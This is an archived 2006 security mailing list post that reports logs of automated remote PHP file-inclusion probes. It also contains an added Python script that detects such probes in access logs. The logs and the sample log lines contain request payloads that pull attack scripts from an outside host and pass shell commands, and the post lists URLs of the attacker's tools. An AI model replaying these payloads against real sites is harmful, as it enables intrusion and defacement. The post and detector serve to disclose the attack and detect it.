WebApp Sec mailing list archives

Defacing Groups using PHP Include Attacks as Vector
From: bugtraq () cgisecurity net
Date: Sun, 8 Jan 2006 22:13:05 -0500 (EST)

For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some defacing groups are writing/implementing perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). Below is a log snippet.

202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-trivial/1.35"

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating :)

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I've contacted SANS since the parent host *appears* to be hacked.

 - Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]
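An added detection example, not part of Robert's post: it parses Apache combined-format access log lines like the ones above and flags any query parameter whose value is a remote URL, which is the signature of this kind of include probing (the probe appends its own `cmd=` parameter, which the included script would read). The log lines, client IPs and the attacker.example host below are constructed for the example, not taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: client, ident, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample log (hosts and IPs are documentation/placeholder values), modelled on the snippet above.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
203.0.113.5 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://attacker.example/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
203.0.113.5 - - [08/Jan/2006:21:32:45 -0500] "GET /archive/?ref=http://attacker.example/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial/1.35"
203.0.113.5 - - [08/Jan/2006:21:32:46 -0500] "GET //lib/?page=http://attacker.example/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
198.51.100.7 - - [08/Jan/2006:22:01:10 -0500] "GET /archive/?ref=2005&page=3 HTTP/1.1" 200 25445 "http://www.example.org/" "Mozilla/5.0"
"""

def rfi_findings(line):
    """Return (param, value) pairs whose value is a remote URL; [] for clean or unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(value)]

def scan_log(lines):
    """Summarise remote-include probes per client IP: hit count, remote URLs, probed parameters, user agents."""
    report = {}
    for line in lines:
        hits = rfi_findings(line)
        if not hits:
            continue
        m = LOG_RE.match(line)
        entry = report.setdefault(m.group("ip"),
                                  {"count": 0, "remote_urls": set(), "params": set(), "agents": set()})
        entry["count"] += 1
        entry["agents"].add(m.group("ua"))
        for name, value in hits:
            entry["params"].add(name)
            # The trailing "?" is there so that anything the vulnerable script appends becomes a harmless query string.
            entry["remote_urls"].add(value.split("?")[0])
    return report

if __name__ == "__main__":
    for ip, entry in scan_log(SAMPLE_LOG.splitlines()).items():
        print(ip, entry["count"], sorted(entry["params"]), sorted(entry["remote_urls"]), sorted(entry["agents"]))
```

A 200 response to such a probe proves nothing by itself (the page above returned 200 to every one), so the report lists the probed parameters rather than treating the status code as a verdict.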
